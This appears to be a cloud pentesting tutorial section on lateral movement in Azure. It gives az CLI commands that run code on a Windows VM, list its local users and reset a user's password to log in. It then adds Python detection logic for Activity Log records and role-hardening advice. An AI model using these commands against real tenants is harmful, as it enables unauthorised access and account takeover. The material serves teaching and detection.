Virtual Machine Abuse
This section depends heavily on the Abusing Managed Identities module, so I recommend checking that out first and then coming back to this ʕ •ᴥ•ʔ The setup is the same: the attack assumes you have compromised a Linux-based VM, which we can then use to execute commands on a Windows VM in the same resource group.
To start, we'll list all the VMs we have access to:
~ ∮ az vm list -g DefaultResourceGroup-CUS --output table
To execute a command on one of them, we can run the following:
~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id IPConfig
One thing that comes in really handy for lateral movement is being able to list users:
~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id RunPowerShellScript --scripts Get-LocalUser
Now that we know all the existing users on the VM, we can reset one of their passwords and use the new one to log in:
~ ∮ az vm user update -u <username> -p 'SomethingSecure123!' -n <vm_name> -g DefaultResourceGroup-CUS
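On the detection side, both `az vm run-command invoke` and `az vm user update` are control-plane calls that land in the Azure Activity Log. The following is an added example, not part of the original page: it filters records shaped like `az monitor activity-log list` output for those operations and marks whether the caller looks like a user or a non-user principal such as a managed identity. The sample records, the `win-vm` name, the object ID, the subscription placeholder and the caller heuristic are constructed assumptions.

```python
# Control-plane operations behind the commands on this page (compared lower-cased).
WATCHED = {
    "microsoft.compute/virtualmachines/runcommand/action": "run-command",
    # az vm user update resets credentials by writing the VMAccess extension
    "microsoft.compute/virtualmachines/extensions/write": "extension-write",
}
RG = "/subscriptions/SUB-PLACEHOLDER/resourceGroups/DefaultResourceGroup-CUS"
VM = RG + "/providers/Microsoft.Compute/virtualMachines/win-vm"  # constructed VM name
MI = "00000000-0000-0000-0000-000000000001"  # constructed object ID

def rec(ts, caller, op, status, rid):
    """Build one constructed record with the fields this check reads."""
    return {"eventTimestamp": ts, "caller": caller, "operationName": {"value": op},
            "status": {"value": status}, "resourceId": rid}

# Constructed sample records, shaped like `az monitor activity-log list` output.
RUN = "Microsoft.Compute/virtualMachines/runCommand/action"
SAMPLE = [
    rec("2024-01-01T10:00:00Z", MI, "Microsoft.Compute/virtualMachines/read", "Succeeded", VM),
    rec("2024-01-01T10:02:00Z", MI, RUN, "Succeeded", VM),
    rec("2024-01-01T10:03:00Z", MI, RUN, "Failed", VM),
    rec("2024-01-01T10:05:00Z", MI, "Microsoft.Compute/virtualMachines/extensions/write",
        "Succeeded", VM + "/extensions/enablevmaccess"),
    rec("2024-01-01T11:00:00Z", "admin@example.com", RUN, "Succeeded", VM),
]

def caller_kind(caller):
    # Heuristic (assumption): users show up as a UPN, managed identities and
    # service principals as a bare object ID.
    return "user" if "@" in caller else "non-user"

def vm_name(resource_id):
    """Return the path segment that follows 'virtualMachines', or ''."""
    parts = resource_id.split("/")
    lowered = [p.lower() for p in parts]
    if "virtualmachines" in lowered:
        i = lowered.index("virtualmachines")
        if i + 1 < len(parts):
            return parts[i + 1]
    return ""

def find_vm_abuse(records):
    """Return (timestamp, kind, caller_kind, vm) for each successful watched operation."""
    hits = []
    for r in records:
        kind = WATCHED.get(r.get("operationName", {}).get("value", "").lower())
        if kind and r.get("status", {}).get("value") == "Succeeded":
            hits.append((r["eventTimestamp"], kind, caller_kind(r.get("caller", "")),
                         vm_name(r.get("resourceId", ""))))
    return hits
```

A run-command or extension write issued by a non-user principal against a VM it does not normally manage is the pattern worth alerting on; restricting `Microsoft.Compute/virtualMachines/runCommand/action` and `Microsoft.Compute/virtualMachines/extensions/write` in the identity's role assignment removes the path entirely.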